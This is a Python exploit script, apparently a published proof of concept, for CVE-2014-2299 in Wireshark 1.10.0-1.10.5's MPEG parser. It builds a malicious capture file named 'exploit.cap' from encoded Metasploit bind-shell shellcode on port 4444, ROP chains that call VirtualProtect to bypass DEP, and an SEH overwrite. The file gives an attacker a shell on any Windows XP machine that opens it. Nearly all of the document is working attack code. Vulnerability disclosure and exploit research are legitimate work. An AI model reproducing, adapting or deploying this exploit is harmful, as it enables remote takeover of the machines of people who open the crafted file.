#!/usr/bin/python
# Wireshark 1.10.0-1.10.5 MPEG file parser SEH exploit ASLR/DEP Bypass
# Discovered: 14-6-2013
# Exploit written: 17-6-2013
# Vendor contacted: 6-3-2014
# Vulnerability solved: 7-3-2014 (upgrade to Wireshark 1.10.6)
# Exploit Published: 7-3-2014 
# Email: security [at] forsec.nl
# Tested on Windows XP SP3, DEP enabled, Wirehark 1.10.0
# CVE: CVE-2014-2299

import struct

header = '\xFF\xFB'

# Bad characters = \x00\x0a\x0d\x09
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, 
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
shellcode = ( 
"\xdb\xdc\xba\xa0\x2a\xe7\xfa\xd9\x74\x24\xf4\x5e\x2b\xc9" +
"\xb1\x56\x31\x56\x18\x83\xc6\x04\x03\x56\xb4\xc8\x12\x06" +
"\x5c\x85\xdd\xf7\x9c\xf6\x54\x12\xad\x24\x02\x56\x9f\xf8" +
"\x40\x3a\x13\x72\x04\xaf\xa0\xf6\x81\xc0\x01\xbc\xf7\xef" +
"\x92\x70\x38\xa3\x50\x12\xc4\xbe\x84\xf4\xf5\x70\xd9\xf5" +
"\x32\x6c\x11\xa7\xeb\xfa\x83\x58\x9f\xbf\x1f\x58\x4f\xb4" +
"\x1f\x22\xea\x0b\xeb\x98\xf5\x5b\x43\x96\xbe\x43\xe8\xf0" +
"\x1e\x75\x3d\xe3\x63\x3c\x4a\xd0\x10\xbf\x9a\x28\xd8\xf1" +
"\xe2\xe7\xe7\x3d\xef\xf6\x20\xf9\x0f\x8d\x5a\xf9\xb2\x96" +
"\x98\x83\x68\x12\x3d\x23\xfb\x84\xe5\xd5\x28\x52\x6d\xd9" +
"\x85\x10\x29\xfe\x18\xf4\x41\xfa\x91\xfb\x85\x8a\xe1\xdf" +
"\x01\xd6\xb2\x7e\x13\xb2\x15\x7e\x43\x1a\xca\xda\x0f\x89" +
"\x1f\x5c\x52\xc6\xec\x53\x6d\x16\x7a\xe3\x1e\x24\x25\x5f" +
"\x89\x04\xae\x79\x4e\x6a\x85\x3e\xc0\x95\x25\x3f\xc8\x51" +
"\x71\x6f\x62\x73\xf9\xe4\x72\x7c\x2c\xaa\x22\xd2\x9e\x0b" +
"\x93\x92\x4e\xe4\xf9\x1c\xb1\x14\x02\xf7\xc4\x12\xcc\x23" +
"\x85\xf4\x2d\xd4\x38\x59\xbb\x32\x50\x71\xed\xed\xcc\xb3" +
"\xca\x25\x6b\xcb\x38\x1a\x24\x5b\x74\x74\xf2\x64\x85\x52" +
"\x51\xc8\x2d\x35\x21\x02\xea\x24\x36\x0f\x5a\x2e\x0f\xd8" +
"\x10\x5e\xc2\x78\x24\x4b\xb4\x19\xb7\x10\x44\x57\xa4\x8e" +
"\x13\x30\x1a\xc7\xf1\xac\x05\x71\xe7\x2c\xd3\xba\xa3\xea" +
"\x20\x44\x2a\x7e\x1c\x62\x3c\x46\x9d\x2e\x68\x16\xc8\xf8" +
"\xc6\xd0\xa2\x4a\xb0\x8a\x19\x05\x54\x4a\x52\x96\x22\x53" +
"\xbf\x60\xca\xe2\x16\x35\xf5\xcb\xfe\xb1\x8e\x31\x9f\x3e" +
"\x45\xf2\xaf\x74\xc7\x53\x38\xd1\x92\xe1\x25\xe2\x49\x25" +
"\x50\x61\x7b\xd6\xa7\x79\x0e\xd3\xec\x3d\xe3\xa9\x7d\xa8" +
"\x03\x1d\x7d\xf9"
)

#---------------------          ROP 1        ------------------------#
rop = struct.pack('<L', 0x6c4c51b1)         # INC EAX # PUSH ESP # POP EBP # RETN    ** [libsmi-2.dll] **
rop += struct.pack('<L', 0x64755067)        # DEC EAX # RETN    ** [libpng15-15.dll] ** 
rop += struct.pack('<L',0x1003d541)         # ADD EAX,EBP # RETN    ** [wiretap-1.10.0.dll] **
rop += struct.pack('<L',0x61792c97)         # DEC EDX # ADD ESP,1C # RETN    ** [libgtk-win32-2.0-0.dll] **

#---------------------          ROP 2        ------------------------#
rop2 = struct.pack('<L', 0x647460a8)        # ADD EAX,144 # RETN    ** [libpng15-15.dll] **
rop2 += struct.pack('<L', 0x6c4f224e)       # MOV EDX,EBP # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [libsmi-2.dll] **
rop2 += struct.pack('<L', 0x41414141)       # Compensate POP EBX
rop2 += struct.pack('<L', 0x41414141)       # Compensate POP ESI
rop2 += struct.pack('<L', 0x41414141)       # Compensate POP EDI
rop2 += struct.pack('<L', 0x41414141)       # Compensate POP EBP
rop2 += struct.pack('<L', 0x68dd5049)       # MOV DWORD PTR DS:[EDX+10],EAX # RETN    ** [libcairo-2.dll] **
rop2 += struct.pack('<L', 0x6b8032ca)       # MOV DWORD PTR DS:[EDX+14],EAX # RETN    ** [libjpeg-8.dll] **
rop2 += struct.pack('<L', 0x655a5f3c)       # XOR EAX,EAX # RETN    ** [libpango-1.0-0.dll] **
rop2 += struct.pack('<L', 0x647460a8)       # ADD EAX,144 # RETN    ** [libpng15-15.dll] **
rop2 += struct.pack('<L', 0x647460a8)       # ADD EAX,144 # RETN    ** [libpng15-15.dll] **
rop2 += struct.pack('<L', 0x647460a8)       # ADD EAX,144 # RETN    ** [libpng15-15.dll] **
rop2 += struct.pack('<L', 0x6b28318b) * 8   # INC EDX # RETN    ** [libgpg-error-0.dll] **
rop2 += struct.pack('<L', 0x68dd5049)       # MOV DWORD PTR DS:[EDX+10],EAX # RETN    ** [libcairo-2.dll] **
rop2 += struct.pack('<L', 0x655a5f3c)       # XOR EAX,EAX # RETN    ** [libpango-1.0-0.dll] **
rop2 += struct.pack('<L', 0x78b462d3)       # ADD EAX,40 # POP EBP # RETN    ** [MSVCR100.dll] **
rop2 += struct.pack('<L', 0x41414141)       # Compensate POP EBP
rop2 += struct.pack('<L', 0x6b28318b) * 4   # INC EDX # RETN    ** [libgpg-error-0.dll] **
rop2 += struct.pack('<L', 0x68dd5049)       # MOV DWORD PTR DS:[EDX+10],EAX # RETN    ** [libcairo-2.dll] ** 
rop2 += struct.pack('<L', 0x68e12005)       # MOV EAX,EDX # RETN    ** [libcairo-2.dll] ** 
rop2 += struct.pack('<L', 0x63ccb108)       # PUSH EAX # POP ESP # RETN    ** [liblzma-5.dll] **

#--------------------- VirtualProtect parameters ------------------------#
params = struct.pack('<L', 0x7C801AD4)      # VirtualProtect address XP SP3
params += "WWWW"                            # Shellcode address
params += "XXXX"                            # Shellcode address
params += "YYYY"                            # Size
params += "ZZZZ"                            # EXECUTABLE 0x40
params += struct.pack('<L', 0x66824f7d)     # Writeable address

junk2 = '\x41' * 192                        # 192 first bytes
seh = struct.pack('<L',0x613dbb46)          # libfreetype-6.dll
ropnop = '\x90' * 100                       # NOPs

filestruct = junk2 + rop + params + '\x45' * 4 + rop2 + '\x41' * 280 + ropnop + shellcode + '\x41' * (70136-len(junk2)-len(params)-len(shellcode)-284-len(rop)-len(rop2)-len(ropnop)) + seh + params + '\x44' * (50-len(params))

f = open('exploit.cap', 'w')
f.write(header + filestruct)

print 'Done .. evil file written'